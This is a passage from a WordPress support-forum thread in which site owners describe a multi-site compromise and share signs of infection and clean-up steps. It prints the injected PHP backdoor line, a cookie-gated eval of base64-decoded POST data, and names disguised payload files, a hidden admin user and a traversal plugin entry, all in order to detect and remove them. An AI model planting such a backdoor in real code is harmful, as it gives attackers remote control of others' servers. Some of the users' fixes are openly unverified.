• This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5

    A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

    Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I’d cleaned those up and upgraded to 2.3.3, since 2.5 wasn’t yet available as a release.

    This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

    I’m still trying to unravel the mess and clean it up, but here’s a rundown of tell-tale signs I’ve found.

    Check any .php file for this code added to the top of the file:
    <?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

    See if there are any files in writable directories that have the same named as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven’t yet figured out where or how that info is sent to anyone.

    I can send a copy of the script to anyone in WP security if needed, but I don’t know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

    Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

    One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

    So I’ve asked all the users on those sites to update their passwords, even if they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

    As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I’ve listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

    I am in the process of changing the DB passwords on those sites, and deleting the new “WordPress” user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5

    What I don’t know yet is if one site was the “in” door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.

Viewing 15 replies - 31 through 45 (of 53 total)
  • okay, I figured a couple things out…

    there’s a few strange looking databases in my phpadmin area, most look similar to this :

    “rss_1f6c214c60d29cacd0400469cc53ff37”

    and then, inside those, there’s RIDICULOUS lines of code filled with all sorts of link bait and queries I’ve been seeing hit my blog.

    So I’m going to delete them now. I figure I have a backup of te whole database so if I break something I can restore it… but I’m feeling pretty confident here since inside those entries I’m seeing all sorts of evil looking copy and links :

    O:9:"MagpieRSS":17:{s:6:"parser";i:0;s:12:"current_item";a:0:{}s:5:"items";a:1:{i:0;a:3:{s:5:"title";s:16:"No results found";s:11:"description";s:43:"No results were found for https://burst/blog";s:7:"summary";s:43:"No results were found for https://burst/blog";}}s:7:"channel";a:10:{s:9:"generator";s:15:"Technorati v1.0";s:9:"webmaster";s:43:"[email protected] (Technorati Support)";s:4:"docs";s:37:"https://blogs.law.harvard.edu/tech/rss";s:3:"ttl";s:2:"60";s:4:"tapi";a:3:{s:6:"result";s:5:"
        ";s:10:"result_url";s:17:"https://burst/blog";s:19:"result_rankingstart";s:1:"0";}s:6:"result";s:16:"
    
    ";s:5:"title";s:23:"Technorati Search for: ";s:4:"link";s:17:"https://burst/blog";s:7:"pubdate";s:29:"Thu, 01 Jan 1970 00:00:00 GMT";s:7:"tagline";N;}s:9:"textinput";a:4:{s:5:"title";s:17:"Search Technorati";s:11:"description";s:43:"Search millions of blogs for the latest on:";s:4:"name";s:1:"s";s:4:"link";s:32:"https://technorati.com/search.php";}s:5:"image";a:3:{s:3:"url";s:50:"https://static.technorati.com/pix/logos/logo_sm.gif";s:5:"title";s:15:"Technorati logo";s:4:"link";s:21:"https://technorati.com";}s:9:"feed_type";s:3:"RSS";s:12:"feed_version";s:3:"2.0";s:5:"stack";a:0:{}s:9:"inchannel";b:0;s:6:"initem";b:0;s:9:"incontent";b:0;s:11:"intextinput";b:0;s:7:"inimage";b:0;s:13:"current_field";s:0:"";s:17:"current_namespace";b:0;s:19:"_CONTENT_CONSTRUCTS";a:6:{i:0;s:7:"content";i:1;s:7:"summary";i:2;s:4:"info";i:3;s:5:"title";i:4;s:7:"tagline";i:5;s:9:"copyright";}}

    FYI, this exploit extends to 1.5.2 as well. Yeah, I know I have blogs that I need to upgrade… sigh.

    I could not find wp-info anywhere, but had several instances of the backdoor code in php files, several _old.jpgg etc, a phantom wordpress() user and it does indeed say its running 2.5… I am having problems getting into phpMyAdmin (probably unrelated), so I can’t say for certain what is in there. From the date codes it looks like I was hit twice, one time on the 16th and once on the 25th, IIRC.

    After almost 12 hours, was able to finally fix the WordPress 2.5.1. “still needs to upgrade to 2.5.1.” issue. Most of the suggestions were mentioned already but here are links and steps that might help.

    MAKE SURE YOU BACK UP YOUR DATABASE BEFORE DOING THIS!

    After upgrading my WordPress version 2.5 to 2.5.1., the dashboard is still telling me that I’m still on version 2.5. That’s what brought me to the forums and eventually I found out I have those _new, _old, .pngg.php, .jpgg.ph, etc files in my content directory. So I immediately deleted that. For some reason though I can’t find the ‘wp-info.txt’ file, even while viewing the hidden files (using filezilla).

    This was the most helpful link I got:

    1. https://wordpressphilippines.org/blog/has-your-wordpress-been-hacked-recently/ – read carefully and follow as instructed.

    2. Make sure you delete the phantom “WordPress” user. To instantly check if you have that user, go to your WordPress admin “users” page, enter “WordPress” under Search Users, if you DO NOT get a “No matching users were found!” you definitely have the phantom user in your database. You will notice a weird blank box appearing if you have that user. Another easy way is to Write Post, scroll down to Post Author, if there’s an “invisible” author, that’s the phantom WordPress user.

    Check the link provided on #1, and delete it by accessing your database.

    3. As mentioned in one of the entries above, look under database wp_options the VALUES ‘active_plugins’ and ‘deactivated_plugins’. It is very likely you will notice a plug-in that’s not supposed to be there. Here’s what I get in mine:

    i:0;s:117:”../../../../../../../../../../../../../../../../../../../../../../tmp/tmpw6d0cG/sess_dea436 and so on (a very long plug-in entry)

    Remove that entry. If it works, then fine. If it doesn’t, you can delete the entire line entry (active_plugins and deactivated_plugins) and WordPress will automatically create new entries BUT MAKE SURE YOU BACKUP FIRST! THIS HAS NOT BEEN VERIFIED TO WORK FOR EVERYONE, but that’s what I did on mine and it worked. When I enter the admin page, I just have to re-activate the plug-ins.

    Check your dashboard. You’ll read the message: “This is WordPress version 2.5.1.”. BACKUP your database immediately to help you against new or missed exploits.

    What I noticed is that removing the offensive files will still give you the false version message in your dashboard. What cleared it are steps #2 and #3.

    I strongly suggest you download the WP Security Scan plug-in (newly updated, just google it). It checks your writable directories as an added insurance that your directories have the correct chmod. If you tend to edit your themes often, don’t forget to give them back their original permissions for added security.

    I hope this helps. BACKUP first before trying.

    ultrasonic, this was a HUGE help.

    I’ll be keeping an eye on my db for a while to see if more problems crop up.

    Thanks so much for all the sleuthing.

    I don’t know if this is helpful information to anyone trying to track down the source of this problem, but I’ll post it just in case.

    I discovered the hack today when I tried to upgrade from 2.5 to 2.5.1. After following this thread, I found the offending lines of php code in one of my templates, plus all the rest.

    Up until April 19, I was running WP 2.0.4. On April 19, I backed up my entire site in preparation for the move to 2.5.

    I’ve had a look through that backup. On that date, my template files were OK. So the hack hadn’t been triggered yet. However, in my wp-content/uploads folder, there is a file called js.php, dated April 3.

    This file seems to be the one with the payload for the hack. I’m not really a php coder but have enough of a software background to recognize it’s not doing nice things, and believe I’ve found the piece of code that injects the offending line of PHP code into the beginning of people’s files. The file makes several references to the following URL https://unurex.cn

    Is there anyone I can send this file to for study? I’m not that familiar with the system around here.

    Katrina

    Me again.

    After studying the payload file, I would really appreciate someone more competent than me having a look:

    1) To tell me the extent of the damage to my security. What exactly did the hack do and what did the hackers get from me?

    2) To tell me if the steps mentioned by above posters are sufficient for getting rid of it. js.php seems to try to restore the hack, or embed stuff to restore it. It also seems to affect wp-includes/functions.php, or try to, which worries me, because I hadn’t seen that mentioned by anyone yet. I’m assuming my update to 2.5.1 clobbered whatever it did to functions.php, but I can’t be sure.

    Just tell me who to communicate with to send the file to and I will pass it along.

    Kat

    Hm.. my site got hacked too.. It seems that all the index.htm/index.php files contained in my public_html folders were deleted and switched. I’m using wordpress version 2.5. In additions, index files in subdomains that were locked up were also switched.

    https://sgorchids.com/

    I will be leaving my site the way it is for a while till about two weeks later. Just wondering if anybody experienced security issues with wordpress version 2.5.1 yet? I’m hoping to rebuild my site on a security stable version of wordpress.

    ultrasonic: thanks for all your hard work on this – I finally got everything cleaned up on my installation. Much appreciated.

    I’ve had a couple of sites hit by this, and spent a while cleaning up the mess. Now that’s done, I’ve been looking at the logs and all the accesses I can find so far for the hacked files are from two IP addresses, both in the same block:

    194.110.162.23 and 194.110.162.79

    The earlier accesses are with the .23 and later ones .79. The block is registered to extendedhost.com in Canada, though there is no website there I can find.

    Will continue to dig a little and see what else I can find.

    I have installed wordpress 2-3 times taking new build from www.remarpro.com. But after some hours, it get hacked by some person called cesar. Can you please check if there is some loophole that needs to be patched!

    my site URL is https://aksblogger.com

    Regards,
    AKS.
    https://Shrink2One.com

    As a final clean-up note for your databases, not only should you check your active plugins database entry in wp_options, but in your wp_posts, and wp_postmeta tables, look for the following and delete these entries:

    in wp_posts:
    any post titled rzf.txt (or a filename/title you do not recognize). Make a note of the post_id if you find any of these.

    in wp_postmeta:
    entries that list an attachment for the post_id you noted above. They will have meta_keys of _wp_attached_file and _wp_attachment_metadata and post_ids matching any hidden posts you found above. the meta_value will point to files like rzf.txt, or the bad pngs and jpegs mentioned in prior posts

    I was just doing some extra surveying of my site when I came across these entries I overlooked the first time around. Since I’d cleared the attachments out of uploads already, no extra harm done.

    Crazy hackers…

    Seems to me a hundreds of thousands of wordpress sites got hacked and wordpress doesn’t know exactly how it happened.

    I was using the current version each time my site was hacked.

    I too have undergone to attack at myself on a blog I have found out the same plug-in only the modified

    source code here

    https://wordpress.pastebin.com/f7e85d3e4

Viewing 15 replies - 31 through 45 (of 53 total)
  • The topic ‘Security issue, multiple sites’ is closed to new replies.